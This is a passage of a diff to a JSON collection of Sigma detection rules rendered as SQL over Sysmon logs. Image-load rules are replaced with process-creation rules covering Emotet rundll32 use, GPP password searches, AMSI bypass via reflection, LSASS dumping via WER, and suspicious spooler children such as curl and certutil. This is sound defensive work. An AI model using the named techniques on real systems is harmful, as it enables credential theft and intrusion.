ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": 
"proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG 
Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. 
the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((Image LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\wget.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\write.exe' ESCAPE '\\' OR Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": 
"9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. 
Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": 
"proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR 
CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + 
"attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded 
LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnx.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * 
FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' 